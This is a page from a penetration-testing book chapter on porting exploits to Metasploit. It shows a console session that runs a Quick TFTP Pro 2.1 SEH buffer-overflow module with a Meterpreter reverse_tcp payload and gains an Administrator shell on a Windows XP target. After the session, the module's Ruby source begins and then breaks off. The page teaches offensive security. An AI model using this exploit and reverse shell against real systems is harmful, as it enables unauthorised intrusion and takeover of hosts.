background image

Porting Exploits to the Metasploit Framework

231

Figure 15-6: Quick TFTP fully controlled

Next, we remove the dummy shellcode and run the module with a real 

payload to get our shell, as shown here:

msf > 

use exploit/windows/tftp/quicktftp_book

msf exploit(quicktftp_book) > 

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(quicktftp_book) > 

set LHOST 192.168.1.101

LHOST => 192.168.1.101
msf exploit(quicktftp_book) > 

set RHOST 192.168.1.155

RHOST => 192.168.1.155
msf exploit(quicktftp_book) > 

exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Trying target Windows XP SP2...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.155:1036)
meterpreter > 

getuid

Server username: V-XP-SP2-BARE\Administrator

Now that we have our Meterpreter shell, we’ve successfully ported an 

exploit and used the Framework in an SEH exploit!

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::Remote::Udp
        include Msf::Exploit::Remote::Seh

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Quick TFTP Pro 2.1 Long Mode Buffer Overflow',
                        'Description'    => %q{
                                This module exploits a stack overflow in Quick TFTP Pro 2.1.
                        },